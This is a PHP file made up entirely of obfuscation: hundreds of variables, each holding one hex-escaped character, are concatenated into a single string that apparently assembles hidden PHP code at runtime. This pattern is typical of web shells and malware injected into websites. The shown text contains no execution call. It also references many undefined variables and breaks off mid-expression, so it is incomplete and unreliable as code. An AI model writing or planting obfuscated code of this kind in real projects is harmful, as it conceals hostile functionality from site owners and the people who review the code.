$tdkr967="\x29";$tdkr1221="\x24";$tdkr1347="\x67";$tdkr218="\x0a";$tdkr335="\x28";$tdkr1509="\x75";$tdkr1231="\x5b";
$tdkr1343="\x74";$tdkr1313="\x6d";$tdkr1302="\x5f";$tdkr1276="\x32";$tdkr793="\x3b";$tdkr399="\x6e";$tdkr740="\x3b";$tdkr310="\x09";$tdkr739="\x29";$tdkr1689="\x0a";$tdkr4="\x72";$tdkr1711="\x6e";
$tdkr652="\x20";$tdkr1554="\x23";$tdkr206="\x64";$tdkr239="\x6e";$tdkr379="\x65";
$tdkr562="\x0a";$tdkr773="\x28";$tdkr1266="\x20";$tdkr114="\x65";
$tdkr94="\x0a";
$tdkr1360="\x28";$tdkr138="\x73";$tdkr1165="\x3b";$tdkr1339="\x79";$tdkr919="\x2e";$tdkr1647="\x6e";$tdkr1053="\x2e";
$tdkr689="\x30";$tdkr1125="\x0a";$tdkr437="\x72";$tdkr1="\x20";$tdkr1385="\x29";$tdkr821="\x72";$tdkr1310="\x7b";$tdkr589="\x5f";$tdkr1504="\x20";$tdkr1674="\x6f";$tdkr741="\x0a";$tdkr1193="\x64";$tdkr1617="\x65";$tdkr263="\x61";$tdkr943="\x28";$tdkr780="\x30";$tdkr1544="\x63";$tdkr384="\x2c";$tdkr1058="\x76";$tdkr1314="\x79";$tdkr1621="\x2c";$tdkr1226="\x09";$tdkr772="\x74";$tdkr36="\x6e";$tdkr406="\x20";$tdkr852="\x0a";$tdkr184="\x0a";$tdkr582="\x20";
$tdkr1335="\x3b";
$tdkr1681="\x24";$tdkr1215="\x24";$tdkr946="\x69";$tdkr113="\x76";$tdkr668="\x70";
$tdkr1413="\x22";$tdkr768="\x20";$tdkr888="\x7b";$tdkr1713="\x3b";$tdkr654="\x0a";$tdkr690="\x32";$tdkr948="\x25";$tdkr445="\x65";$tdkr115="\x64";
$tdkr1025="\x22";$tdkr556="\x78";$tdkr1341="\x24";$tdkr145="\x61";$tdkr46="\x39";$tdkr1085="\x6e";$tdkr1426="\x30";$tdkr1434="\x0a";$tdkr727="\x24";
$tdkr528="\x74";$tdkr111="\x65";$tdkr709="\x24";$tdkr266="\x61";$tdkr225="\x28";$tdkr348="\x29";$tdkr190="\x73";$tdkr1044="\x0a";
$tdkr95="\x23";$tdkr149="\x70";$tdkr1148="\x66";$tdkr734="\x5b";$tdkr1649="\x72";$tdkr541="\x40";$tdkr1397="\x67";$tdkr635="\x3d";$tdkr485="\x65";$tdkr660="\x6f";$tdkr73="\x20";$tdkr253="\x20";$tdkr1205="\x09";
$tdkr504="\x63";$tdkr774="\x72";$tdkr1488="\x73";
$tdkr1569="\x70";$tdkr678="\x25";$tdkr1228="\x24";$tdkr1558="\x20";$tdkr1292="\x0a";
$tdkr135="\x64";$tdkr1684="\x22";$tdkr659="\x63";$tdkr913="\x65";$tdkr1483="\x20";$tdkr536="\x66";$tdkr1171="\x3b";
$tdkr1574="\x74";$tdkr1091="\x64";$tdkr1308="\x67";$tdkr917="\x24";
$tdkr495="\x69";$tdkr81="\x69";
$tdkr1217="\x20";$tdkr1121="\x6c";$tdkr1089="\x63";$tdkr752="\x3d";$tdkr219="\x09";$tdkr460="\x20";
$tdkr1559="\x67";
$tdkr893="\x6d";$tdkr1225="\x09";$tdkr765="\x69";$tdkr916="\x22";$tdkr1142="\x20";
$tdkr489="\x6e";$tdkr76="\x6e";
$tdkr1185="\x20";$tdkr319="\x3d";$tdkr1111="\x61";$tdkr1630="\x72";
$tdkr133="\x73";$tdkr343="\x20";$tdkr1632="\x68";$tdkr1590="\x74";$tdkr746="\x63";
$tdkr1158="\x20";$tdkr26="\x70";$tdkr365="\x74";$tdkr131="\x65";$tdkr603="\x20";
$tdkr1075="\x3b";$tdkr928="\x6f";$tdkr50="\x62";
$tdkr1099="\x73";$tdkr106="\x73";$tdkr646="\x20";$tdkr82="\x6f";$tdkr1139="\x29";
$tdkr673="\x66";$tdkr463="\x20";
$tdkr101="\x72";$tdkr1707="\x61";$tdkr1641="\x6d";$tdkr1106="\x68";
$tdkr1020="\x65";$tdkr251="\x09";
$tdkr1440="\x65";$tdkr5="\x65";$tdkr921="\x3b";$tdkr182="\x30";$tdkr226="\x74";
$tdkr264="\x72";$tdkr1107="\x65";$tdkr1605="\x72";$tdkr930="\x65";$tdkr1260="\x61";
$tdkr1038="\x6d";$tdkr926="\x6d";$tdkr1250="\x20";$tdkr748="\x64";
$tdkr210="\x73";$tdkr950="\x28";$tdkr1068="\x5f";$tdkr362="\x72";$tdkr416="\x09";$tdkr974="\x3b";$tdkr1046="\x24";$tdkr1517="\x6e";
$tdkr537="\x6c";$tdkr104="\x68";$tdkr883="\x2b";$tdkr1164="\x31";$tdkr855="\x6f";$tdkr1493="\x20";$tdkr354="\x70";$tdkr1533="\x20";$tdkr725="\x64";$tdkr1326="\x61";$tdkr1016="\x6d";$tdkr1070="\x61";$tdkr557="\x65";
$tdkr1642="\x65";$tdkr144="\x74";$tdkr989="\x20";$tdkr1607="\x6e";$tdkr236="\x24";
$tdkr1486="\x61";$tdkr786="\x29";$tdkr542="\x73";$tdkr392="\x70";$tdkr1244="\x61";$tdkr1143="\x40";
$tdkr1177="\x09";$tdkr621="\x20";$tdkr1126="\x09";$tdkr1465="\x69";$tdkr904="\x24";$tdkr833="\x20";
$tdkr782="\x2b";$tdkr1273="\x40";
$tdkr333="\x74";$tdkr1279="\x6a";$tdkr1526="\x20";$tdkr1161="\x40";$tdkr1213="\x66";$tdkr815="\x6c";$tdkr1386="\x20";
$tdkr875="\x63";$tdkr2="\x6d";
$tdkr1010="\x22";
$tdkr1657="\x3b";$tdkr65="\x0a";$tdkr1077="\x09";$tdkr575="\x61";$tdkr287="\x77";$tdkr959="\x28";$tdkr299="\x74";$tdkr1160="\x20";$tdkr827="\x24";$tdkr1168="\x2d";$tdkr812="\x65";$tdkr1548="\x2d";$tdkr305="\x72";$tdkr695="\x22";$tdkr235="\x2a";$tdkr483="\x20";$tdkr1393="\x74";$tdkr1449="\x72";
$tdkr715="\x65";$tdkr1421="\x61";
$tdkr394="\x73";$tdkr1373="\x69";$tdkr447="\x20";$tdkr1230="\x31";
$tdkr872="\x24";$tdkr1141="\x3d";$tdkr1056="\x22";
$tdkr1170="\x69";$tdkr458="\x6f";$tdkr336="\x24";$tdkr881="\x20";$tdkr634="\x3c";
$tdkr1378="\x6c";$tdkr56="\x6e";$tdkr1536="\x6e";$tdkr1140="\x20";$tdkr567="\x3d";$tdkr524="\x72";$tdkr281="\x63";$tdkr1472="\x72";$tdkr1429="\x39";$tdkr1520="\x61";$tdkr487="\x63";$tdkr1628="\x6d";$tdkr1446="\x24";$tdkr1529="\x20";
$tdkr258="\x64";$tdkr624="\x69";
$tdkr1582="\x24";$tdkr291="\x68";$tdkr1588="\x6d";$tdkr1175="\x0a";$tdkr389="\x0a";$tdkr849="\x3d";
$tdkr1252="\x69";$tdkr1042="\x22";$tdkr1476="\x65";$tdkr1557="\x73";$tdkr613="\x22";$tdkr221="\x72";
$tdkr10="\x72";$tdkr132="\x72";$tdkr1573="\x6e";$tdkr1084="\x72";$tdkr193="\x69";$tdkr423="\x6f";$tdkr1268="\x6a";$tdkr1129="\x20";$tdkr693="\x22";$tdkr675="\x22";$tdkr482="\x6f";$tdkr1447="\x73";$tdkr1709="\x20";$tdkr176="\x20";
$tdkr1454="\x0a";$tdkr1523="\x6f";$tdkr320="\x20";$tdkr684="\x22";$tdkr312="\x6f";$tdkr20="\x64";$tdkr1518="\x65";$tdkr763="\x28";$tdkr661="\x64";$tdkr375="\x24";$tdkr481="\x73";$tdkr21="\x65";$tdkr879="\x74";
$tdkr339="\x64";$tdkr440="\x79";$tdkr757="\x22";
$tdkr848="\x65";$tdkr1100="\x75";$tdkr59="\x72";
$tdkr1372="\x24";$tdkr1187="\x6e";$tdkr1468="\x72";$tdkr732="\x70";$tdkr168="\x69";$tdkr1334="\x32";$tdkr850="\x22";
$tdkr1216="\x69";$tdkr23="\x6d";$tdkr1246="\x5b";$tdkr54="\x69";$tdkr958="\x64";$tdkr1499="\x63";
$tdkr1633="\x2d";$tdkr1004="\x2e";$tdkr393="\x75";$tdkr1035="\x5f";$tdkr578="\x6e";$tdkr301="\x65";$tdkr607="\x6f";$tdkr228="\x6d";$tdkr172="\x0a";$tdkr209="\x65";$tdkr805="\x63";$tdkr1353="\x3b";$tdkr12="\x20";$tdkr925="\x24";$tdkr386="\x31";$tdkr655="\x09";$tdkr1132="\x61";$tdkr1151="\x20";$tdkr1600="\x63";$tdkr202="\x20";$tdkr1207="\x6e";$tdkr1366="\x20";$tdkr1190="\x72";$tdkr1128="\x79";$tdkr390="\x09";$tdkr1415="\x20";$tdkr869="\x20";$tdkr1348="\x20";$tdkr498="\x20";$tdkr1159="\x3d";$tdkr62="\x6d";$tdkr1524="\x6e";
$tdkr674="\x28";$tdkr1665="\x4f";$tdkr595="\x67";$tdkr637="\x24";$tdkr120="\x6c";$tdkr252="\x23";$tdkr1505="\x63";$tdkr159="\x63";$tdkr1351="\x22";
$tdkr1714="\x0a";$tdkr633="\x20";$tdkr1492="\x75";$tdkr79="\x61";$tdkr897="\x65";
$tdkr1167="\x2d";
$tdkr338="\x6f";$tdkr1257="\x09";$tdkr564="\x24";$tdkr142="\x6d";$tdkr388="\x3b";
$tdkr199="\x28";$tdkr1431="\x29";$tdkr643="\x70";$tdkr240="\x65";$tdkr543="\x63";$tdkr843="\x72";$tdkr459="\x77";$tdkr1660="\x72";$tdkr1156="\x24";$tdkr8="\x65";$tdkr511="\x20";$tdkr213="\x20";
$tdkr591="\x74";$tdkr1278="\x24";$tdkr649="\x24";$tdkr1545="\x6f";$tdkr615="\x3b";$tdkr612="\x20";$tdkr1324="\x28";$tdkr1615="\x6f";
$tdkr923="\x09";$tdkr1703="\x3b";$tdkr125="\x74";$tdkr1698="\x61";$tdkr1371="\x20";
$tdkr538="\x65";$tdkr937="\x6e";$tdkr316="\x24";
$tdkr1696="\x65";$tdkr947="\x20";$tdkr825="\x0a";$tdkr834="\x2e";$tdkr729="\x63";$tdkr1200="\x31";$tdkr1150="\x72";$tdkr563="\x09";$tdkr1438="\x09";$tdkr296="\x6c";$tdkr1553="\x0a";$tdkr1550="\x69";
$tdkr552="\x69";$tdkr1715="\x0a";
$tdkr1352="\x22";$tdkr847="\x6d";$tdkr1489="\x20";$tdkr1677="\x20";$tdkr302="\x20";$tdkr972="\x30";$tdkr722="\x20";$tdkr1054="\x3d";
$tdkr326="\x20";$tdkr866="\x20";$tdkr160="\x6f";$tdkr503="\x65";$tdkr1240="\x3d";$tdkr197="\x3d";$tdkr295="\x69";$tdkr277="\x68";$tdkr938="\x22";$tdkr1272="\x20";
$tdkr63="\x65";$tdkr57="\x20";$tdkr616="\x0a";$tdkr=$tdkr0.
$tdkr1.$tdkr2.$tdkr3.$tdkr4.
$tdkr5.$tdkr6.$tdkr7.$tdkr8.$tdkr9.
$tdkr10.$tdkr11.$tdkr12.$tdkr13.
$tdkr14.$tdkr15.
$tdkr16.$tdkr17.$tdkr18.$tdkr19.$tdkr20.
$tdkr21.$tdkr22.$tdkr23.$tdkr24.$tdkr25.$tdkr26.$tdkr27.$tdkr28.$tdkr29.$tdkr30.$tdkr31.$tdkr32.
$tdkr33.
$tdkr34.$tdkr35.$tdkr36.$tdkr37.$tdkr38.$tdkr39.$tdkr40.
$tdkr41.$tdkr42.$tdkr43.$tdkr44.$tdkr45.$tdkr46.$tdkr47.$tdkr48.$tdkr49.
$tdkr50.$tdkr51.$tdkr52.$tdkr53.$tdkr54.
$tdkr55.
$tdkr56.$tdkr57.$tdkr58.
$tdkr59.$tdkr60.
$tdkr61.$tdkr62.$tdkr63.$tdkr64.$tdkr65.$tdkr66.
$tdkr67.$tdkr68.$tdkr69.$tdkr70.
$tdkr71.$tdkr72.$tdkr73.$tdkr74.$tdkr75.$tdkr76.$tdkr77.$tdkr78.$tdkr79.$tdkr80.
$tdkr81.$tdkr82.$tdkr83.$tdkr84.
$tdkr85.
$tdkr86.$tdkr87.
$tdkr88.
$tdkr89.$tdkr90.$tdkr91.$tdkr92.$tdkr93.$tdkr94.$tdkr95.$tdkr96.
$tdkr97.$tdkr98.$tdkr99.$tdkr100.
$tdkr101.$tdkr102.$tdkr103.
$tdkr104.$tdkr105.
$tdkr106.$tdkr107.$tdkr108.$tdkr109.$tdkr110.$tdkr111.$tdkr112.$tdkr113.$tdkr114.
$tdkr115.$tdkr116.
$tdkr117.
$tdkr118.$tdkr119.$tdkr120.$tdkr121.$tdkr122.$tdkr123.$tdkr124.
$tdkr125.$tdkr126.
$tdkr127.$tdkr128.
$tdkr129.$tdkr130.$tdkr131.$tdkr132.$tdkr133.$tdkr134.$tdkr135.$tdkr136.$tdkr137.$tdkr138.$tdkr139.$tdkr140.
$tdkr141.
$tdkr142.$tdkr143.$tdkr144.$tdkr145.$tdkr146.$tdkr147.$tdkr148.$tdkr149.$tdkr150.
$tdkr151.$tdkr152.$tdkr153.$tdkr154.$tdkr155.
$tdkr156.
$tdkr157.$tdkr158.$tdkr159.$tdkr160.
$tdkr161.$tdkr162.$tdkr163.$tdkr164.$tdkr165.$tdkr166.$tdkr167.$tdkr168.
$tdkr169.$tdkr170.$tdkr171.$tdkr172.$tdkr173.$tdkr174.$tdkr175.$tdkr176.
$tdkr177.$tdkr178.$tdkr179.$tdkr180.$tdkr181.$tdkr182.$tdkr183.$tdkr184.$tdkr185.$tdkr186.$tdkr187.$tdkr188.$tdkr189.$tdkr190.
$tdkr191.$tdkr192.
$tdkr193.$tdkr194.$tdkr195.
$tdkr196.$tdkr197.$tdkr198.$tdkr199.$tdkr200.$tdkr201.$tdkr202.$tdkr203.$tdkr204.$tdkr205.
$tdkr206.$tdkr207.
$tdkr208.$tdkr209.$tdkr210.
$tdkr211.$tdkr212.
$tdkr213.$tdkr214.$tdkr215.$tdkr216.
$tdkr217.$tdkr218.$tdkr219.$tdkr220.
$tdkr221.$tdkr222.
$tdkr223.$tdkr224.$tdkr225.
$tdkr226.$tdkr227.$tdkr228.$tdkr229.$tdkr230.$tdkr231.$tdkr232.$tdkr233.$tdkr234.$tdkr235.
$tdkr236.
$tdkr237.$tdkr238.$tdkr239.$tdkr240.$tdkr241.$tdkr242.$tdkr243.$tdkr244.$tdkr245.
$tdkr246.
$tdkr247.
$tdkr248.$tdkr249.$tdkr250.$tdkr251.$tdkr252.$tdkr253.$tdkr254.$tdkr255.
$tdkr256.$tdkr257.$tdkr258.$tdkr259.$tdkr260.
$tdkr261.$tdkr262.$tdkr263.$tdkr264.$tdkr265.$tdkr266.$tdkr267.
$tdkr268.$tdkr269.$tdkr270.$tdkr271.$tdkr272.
$tdkr273.
$tdkr274.$tdkr275.$tdkr276.
$tdkr277.$tdkr278.$tdkr279.$tdkr280.
$tdkr281.$tdkr282.$tdkr283.$tdkr284.$tdkr285.$tdkr286.$tdkr287.
$tdkr288.
$tdkr289.$tdkr290.$tdkr291.
$tdkr292.$tdkr293.$tdkr294.$tdkr295.$tdkr296.$tdkr297.$tdkr298.$tdkr299.$tdkr300.
$tdkr301.
$tdkr302.$tdkr303.$tdkr304.
$tdkr305.$tdkr306.
$tdkr307.$tdkr308.$tdkr309.$tdkr310.$tdkr311.$tdkr312.
$tdkr313.$tdkr314.$tdkr315.
$tdkr316.$tdkr317.$tdkr318.$tdkr319.
$tdkr320.$tdkr321.$tdkr322.$tdkr323.$tdkr324.$tdkr325.$tdkr326.$tdkr327.$tdkr328.
$tdkr329.$tdkr330.$tdkr331.$tdkr332.$tdkr333.
$tdkr334.$tdkr335.$tdkr336.
$tdkr337.$tdkr338.$tdkr339.$tdkr340.$tdkr341.$tdkr342.$tdkr343.$tdkr344.
$tdkr345.
$tdkr346.$tdkr347.$tdkr348.$tdkr349.$tdkr350.$tdkr351.$tdkr352.$tdkr353.$tdkr354.
$tdkr355.$tdkr356.$tdkr357.$tdkr358.
$tdkr359.$tdkr360.
$tdkr361.
$tdkr362.$tdkr363.$tdkr364.$tdkr365.$tdkr366.$tdkr367.$tdkr368.$tdkr369.$tdkr370.$tdkr371.$tdkr372.$tdkr373.$tdkr374.
$tdkr375.
$tdkr376.$tdkr377.$tdkr378.
$tdkr379.$tdkr380.
$tdkr381.
$tdkr382.$tdkr383.$tdkr384.
$tdkr385.$tdkr386.$tdkr387.$tdkr388.$tdkr389.$tdkr390.$tdkr391.$tdkr392.$tdkr393.$tdkr394.$tdkr395.
$tdkr396.$tdkr397.$tdkr398.$tdkr399.$tdkr400.$tdkr401.$tdkr402.$tdkr403.$tdkr404.$tdkr405.
$tdkr406.
$tdkr407.$tdkr408.$tdkr409.$tdkr410.$tdkr411.$tdkr412.$tdkr413.$tdkr414.$tdkr415.$tdkr416.$tdkr417.$tdkr418.$tdkr419.$tdkr420.$tdkr421.$tdkr422.$tdkr423.
$tdkr424.
$tdkr425.
$tdkr426.
$tdkr427.$tdkr428.
$tdkr429.$tdkr430.$tdkr431.$tdkr432.
$tdkr433.$tdkr434.
$tdkr435.$tdkr436.$tdkr437.$tdkr438.$tdkr439.$tdkr440.$tdkr441.$tdkr442.$tdkr443.$tdkr444.$tdkr445.$tdkr446.$tdkr447.
$tdkr448.
$tdkr449.$tdkr450.
$tdkr451.$tdkr452.$tdkr453.$tdkr454.$tdkr455.
$tdkr456.$tdkr457.$tdkr458.$tdkr459.$tdkr460.$tdkr461.$tdkr462.
$tdkr463.$tdkr464.$tdkr465.$tdkr466.$tdkr467.$tdkr468.
$tdkr469.$tdkr470.$tdkr471.$tdkr472.
$tdkr473.$tdkr474.
$tdkr475.$tdkr476.$tdkr477.$tdkr478.$tdkr479.$tdkr480.$tdkr481.
$tdkr482.$tdkr483.$tdkr484.$tdkr485.
$tdkr486.$tdkr487.$tdkr488.$tdkr489.$tdkr490.
$tdkr491.$tdkr492.
$tdkr493.$tdkr494.$tdkr495.$tdkr496.
$tdkr497.$tdkr498.
$tdkr499.$tdkr500.$tdkr501.$tdkr502.$tdkr503.$tdkr504.$tdkr505.$tdkr506.$tdkr507.$tdkr508.$tdkr509.$tdkr510.$tdkr511.$tdkr512.$tdkr513.$tdkr514.$tdkr515.$tdkr516.
$tdkr517.$tdkr518.$tdkr519.$tdkr520.
$tdkr521.$tdkr522.$tdkr523.$tdkr524.$tdkr525.$tdkr526.$tdkr527.$tdkr528.
$tdkr529.$tdkr530.$tdkr531.$tdkr532.
$tdkr533.$tdkr534.$tdkr535.$tdkr536.$tdkr537.$tdkr538.$tdkr539.$tdkr540.
$tdkr541.
$tdkr542.
$tdkr543.
$tdkr544.$tdkr545.$tdkr546.
$tdkr547.$tdkr548.$tdkr549.$tdkr550.
$tdkr551.$tdkr552.$tdkr553.$tdkr554.$tdkr555.$tdkr556.$tdkr557.$tdkr558.$tdkr559.$tdkr560.$tdkr561.$tdkr562.$tdkr563.$tdkr564.$tdkr565.$tdkr566.$tdkr567.
$tdkr568.
$tdkr569.$tdkr570.
$tdkr571.$tdkr572.$tdkr573.$tdkr574.$tdkr575.$tdkr576.
$tdkr577.$tdkr578.$tdkr579.$tdkr580.$tdkr581.$tdkr582.$tdkr583.$tdkr584.
$tdkr585.$tdkr586.$tdkr587.$tdkr588.$tdkr589.
$tdkr590.
$tdkr591.$tdkr592.$tdkr593.$tdkr594.$tdkr595.$tdkr596.
$tdkr597.$tdkr598.$tdkr599.$tdkr600.$tdkr601.$tdkr602.$tdkr603.$tdkr604.$tdkr605.$tdkr606.$tdkr607.$tdkr608.$tdkr609.$tdkr610.
$tdkr611.$tdkr612.$tdkr613.$tdkr614.$tdkr615.$tdkr616.$tdkr617.$tdkr618.$tdkr619.$tdkr620.$tdkr621.$tdkr622.$tdkr623.$tdkr624.
$tdkr625.
$tdkr626.$tdkr627.
$tdkr628.$tdkr629.$tdkr630.
$tdkr631.$tdkr632.$tdkr633.$tdkr634.$tdkr635.
$tdkr636.
$tdkr637.
$tdkr638.
$tdkr639.$tdkr640.$tdkr641.$tdkr642.$tdkr643.$tdkr644.$tdkr645.$tdkr646.$tdkr647.$tdkr648.$tdkr649.$tdkr650.$tdkr651.$tdkr652.$tdkr653.$tdkr654.$tdkr655.$tdkr656.$tdkr657.$tdkr658.
$tdkr659.$tdkr660.
$tdkr661.$tdkr662.$tdkr663.$tdkr664.
$tdkr665.
$tdkr666.
$tdkr667.$tdkr668.$tdkr669.$tdkr670.$tdkr671.$tdkr672.$tdkr673.$tdkr674.$tdkr675.$tdkr676.$tdkr677.$tdkr678.$tdkr679.$tdkr680.
$tdkr681.$tdkr682.$tdkr683.$tdkr684.
$tdkr685.$tdkr686.$tdkr687.$tdkr688.$tdkr689.$tdkr690.
$tdkr691.$tdkr692.
$tdkr693.$tdkr694.$tdkr695.$tdkr696.$tdkr697.
$tdkr698.$tdkr699.$tdkr700.$tdkr701.$tdkr702.$tdkr703.$tdkr704.
$tdkr705.$tdkr706.$tdkr707.$tdkr708.$tdkr709.$tdkr710.$tdkr711.$tdkr712.
$tdkr713.
$tdkr714.$tdkr715.$tdkr716.$tdkr717.$tdkr718.$tdkr719.$tdkr720.$tdkr721.$tdkr722.$tdkr723.$tdkr724.$tdkr725.$tdkr726.$tdkr727.$tdkr728.$tdkr729.$tdkr730.$tdkr731.$tdkr732.$tdkr733.$tdkr734.$tdkr735.
$tdkr736.$tdkr737.
$tdkr738.
$tdkr739.$tdkr740.
$tdkr741.$tdkr742.$tdkr743.$tdkr744.
$tdkr745.$tdkr746.$tdkr747.$tdkr748.$tdkr749.$tdkr750.$tdkr751.$tdkr752.
$tdkr753.
$tdkr754.$tdkr755.$tdkr756.$tdkr757.$tdkr758.$tdkr759.$tdkr760.$tdkr761.$tdkr762.$tdkr763.$tdkr764.$tdkr765.$tdkr766.$tdkr767.$tdkr768.$tdkr769.$tdkr770.$tdkr771.$tdkr772.$tdkr773.$tdkr774.$tdkr775.$tdkr776.
$tdkr777.$tdkr778.$tdkr779.$tdkr780.$tdkr781.$tdkr782.$tdkr783.$tdkr784.
$tdkr785.$tdkr786.$tdkr787.$tdkr788.$tdkr789.
$tdkr790.$tdkr791.$tdkr792.
$tdkr793.$tdkr794.$tdkr795.$tdkr796.$tdkr797.$tdkr798.$tdkr799.$tdkr800.
$tdkr801.$tdkr802.$tdkr803.$tdkr804.$tdkr805.$tdkr806.$tdkr807.$tdkr808.$tdkr809.$tdkr810.$tdkr811.$tdkr812.$tdkr813.$tdkr814.$tdkr815.$tdkr816.
$tdkr817.$tdkr818.$tdkr819.$tdkr820.
$tdkr821.$tdkr822.
$tdkr823.$tdkr824.$tdkr825.
$tdkr826.$tdkr827.$tdkr828.
$tdkr829.$tdkr830.$tdkr831.$tdkr832.
$tdkr833.$tdkr834.
$tdkr835.$tdkr836.$tdkr837.$tdkr838.$tdkr839.$tdkr840.
$tdkr841.$tdkr842.$tdkr843.$tdkr844.$tdkr845.$tdkr846.$tdkr847.
$tdkr848.$tdkr849.$tdkr850.$tdkr851.$tdkr852.$tdkr853.$tdkr854.$tdkr855.$tdkr856.$tdkr857.$tdkr858.
$tdkr859.$tdkr860.$tdkr861.
$tdkr862.$tdkr863.$tdkr864.$tdkr865.$tdkr866.$tdkr867.$tdkr868.$tdkr869.$tdkr870.
$tdkr871.$tdkr872.$tdkr873.$tdkr874.
$tdkr875.$tdkr876.$tdkr877.$tdkr878.
$tdkr879.$tdkr880.$tdkr881.$tdkr882.$tdkr883.$tdkr884.$tdkr885.
$tdkr886.$tdkr887.$tdkr888.$tdkr889.$tdkr890.
$tdkr891.$tdkr892.$tdkr893.$tdkr894.$tdkr895.$tdkr896.$tdkr897.$tdkr898.$tdkr899.$tdkr900.
$tdkr901.$tdkr902.$tdkr903.$tdkr904.$tdkr905.$tdkr906.$tdkr907.$tdkr908.$tdkr909.$tdkr910.$tdkr911.$tdkr912.$tdkr913.$tdkr914.$tdkr915.$tdkr916.$tdkr917.
$tdkr918.$tdkr919.$tdkr920.$tdkr921.$tdkr922.$tdkr923.$tdkr924.$tdkr925.$tdkr926.$tdkr927.
$tdkr928.
$tdkr929.$tdkr930.$tdkr931.$tdkr932.$tdkr933.$tdkr934.$tdkr935.$tdkr936.
$tdkr937.$tdkr938.
$tdkr939.
$tdkr940.$tdkr941.
$tdkr942.$tdkr943.
$tdkr944.$tdkr945.
$tdkr946.$tdkr947.$tdkr948.$tdkr949.$tdkr950.
$tdkr951.$tdkr952.$tdkr953.$tdkr954.$tdkr955.$tdkr956.$tdkr957.$tdkr958.$tdkr959.$tdkr960.
$tdkr961.$tdkr962.$tdkr963.$tdkr964.$tdkr965.$tdkr966.$tdkr967.$tdkr968.$tdkr969.$tdkr970.$tdkr971.$tdkr972.$tdkr973.$tdkr974.$tdkr975.
$tdkr976.$tdkr977.$tdkr978.$tdkr979.
$tdkr980.$tdkr981.
$tdkr982.$tdkr983.$tdkr984.$tdkr985.
$tdkr986.
$tdkr987.$tdkr988.
$tdkr989.$tdkr990.$tdkr991.$tdkr992.$tdkr993.$tdkr994.$tdkr995.$tdkr996.$tdkr997.$tdkr998.$tdkr999.$tdkr1000.$tdkr1001.$tdkr1002.$tdkr1003.$tdkr1004.$tdkr1005.$tdkr1006.$tdkr1007.$tdkr1008.$tdkr1009.$tdkr1010.$tdkr1011.$tdkr1012.$tdkr1013.$tdkr1014.
$tdkr1015.$tdkr1016.$tdkr1017.$tdkr1018.$tdkr1019.$tdkr1020.
$tdkr1021.$tdkr1022.$tdkr1023.
$tdkr1024.$tdkr1025.$tdkr1026.
$tdkr1027.
$tdkr1028.
$tdkr1029.$tdkr1030.$tdkr1031.$tdkr1032.
$tdkr1033.$tdkr1034.$tdkr1035.$tdkr1036.$tdkr1037.$tdkr1038.$tdkr1039.
$tdkr1040.
$tdkr1041.$tdkr1042.$tdkr1043.
$tdkr1044.$tdkr1045.$tdkr1046.$tdkr1047.$tdkr1048.
$tdkr1049.$tdkr1050.
$tdkr1051.$tdkr1052.$tdkr1053.$tdkr1054.
$tdkr1055.$tdkr1056.$tdkr1057.$tdkr1058.$tdkr1059.
$tdkr1060.$tdkr1061.$tdkr1062.$tdkr1063.$tdkr1064.$tdkr1065.$tdkr1066.$tdkr1067.$tdkr1068.
$tdkr1069.$tdkr1070.$tdkr1071.
$tdkr1072.$tdkr1073.$tdkr1074.$tdkr1075.$tdkr1076.$tdkr1077.
$tdkr1078.
$tdkr1079.
$tdkr1080.
$tdkr1081.$tdkr1082.
$tdkr1083.$tdkr1084.$tdkr1085.$tdkr1086.$tdkr1087.$tdkr1088.$tdkr1089.$tdkr1090.$tdkr1091.$tdkr1092.$tdkr1093.$tdkr1094.$tdkr1095.$tdkr1096.$tdkr1097.$tdkr1098.$tdkr1099.$tdkr1100.
$tdkr1101.$tdkr1102.$tdkr1103.$tdkr1104.
$tdkr1105.$tdkr1106.$tdkr1107.$tdkr1108.$tdkr1109.$tdkr1110.
$tdkr1111.$tdkr1112.$tdkr1113.
$tdkr1114.$tdkr1115.$tdkr1116.
$tdkr1117.$tdkr1118.$tdkr1119.$tdkr1120.
$tdkr1121.$tdkr1122.$tdkr1123.$tdkr1124.
$tdkr1125.$tdkr1126.$tdkr1127.$tdkr1128.$tdkr1129.$tdkr1130.
$tdkr1131.
$tdkr1132.$tdkr1133.$tdkr1134.$tdkr1135.$tdkr1136.$tdkr1137.$tdkr1138.$tdkr1139.$tdkr1140.$tdkr1141.$tdkr1142.$tdkr1143.$tdkr1144.$tdkr1145.$tdkr1146.$tdkr1147.$tdkr1148.$tdkr1149.$tdkr1150.$tdkr1151.$tdkr1152.
$tdkr1153.$tdkr1154.
$tdkr1155.$tdkr1156.$tdkr1157.$tdkr1158.$tdkr1159.$tdkr1160.$tdkr1161.$tdkr1162.$tdkr1163.$tdkr1164.
$tdkr1165.
$tdkr1166.$tdkr1167.
$tdkr1168.$tdkr1169.$tdkr1170.$tdkr1171.$tdkr1172.$tdkr1173.$tdkr1174.
$tdkr1175.$tdkr1176.$tdkr1177.$tdkr1178.$tdkr1179.$tdkr1180.
$tdkr1181.$tdkr1182.$tdkr1183.$tdkr1184.$tdkr1185.
$tdkr1186.$tdkr1187.
$tdkr1188.
$tdkr1189.$tdkr1190.$tdkr1191.$tdkr1192.$tdkr1193.$tdkr1194.
$tdkr1195.$tdkr1196.$tdkr1197.$tdkr1198.$tdkr1199.
$tdkr1200.$tdkr1201.$tdkr1202.$tdkr1203.$tdkr1204.$tdkr1205.$tdkr1206.$tdkr1207.$tdkr1208.$tdkr1209.$tdkr1210.
$tdkr1211.$tdkr1212.$tdkr1213.$tdkr1214.$tdkr1215.
$tdkr1216.
$tdkr1217.$tdkr1218.
$tdkr1219.$tdkr1220.
$tdkr1221.$tdkr1222.$tdkr1223.$tdkr1224.$tdkr1225.$tdkr1226.$tdkr1227.$tdkr1228.$tdkr1229.$tdkr1230.
$tdkr1231.$tdkr1232.
$tdkr1233.$tdkr1234.$tdkr1235.$tdkr1236.
$tdkr1237.$tdkr1238.
$tdkr1239.$tdkr1240.$tdkr1241.$tdkr1242.
$tdkr1243.$tdkr1244.$tdkr1245.$tdkr1246.$tdkr1247.$tdkr1248.
$tdkr1249.$tdkr1250.$tdkr1251.$tdkr1252.
$tdkr1253.
$tdkr1254.$tdkr1255.$tdkr1256.$tdkr1257.$tdkr1258.$tdkr1259.$tdkr1260.
$tdkr1261.$tdkr1262.$tdkr1263.$tdkr1264.$tdkr1265.$tdkr1266.$tdkr1267.$tdkr1268.$tdkr1269.$tdkr1270.$tdkr1271.$tdkr1272.$tdkr1273.$tdkr1274.$tdkr1275.$tdkr1276.$tdkr1277.$tdkr1278.$tdkr1279.$tdkr1280.$tdkr1281.
$tdkr1282.
$tdkr1283.$tdkr1284.$tdkr1285.
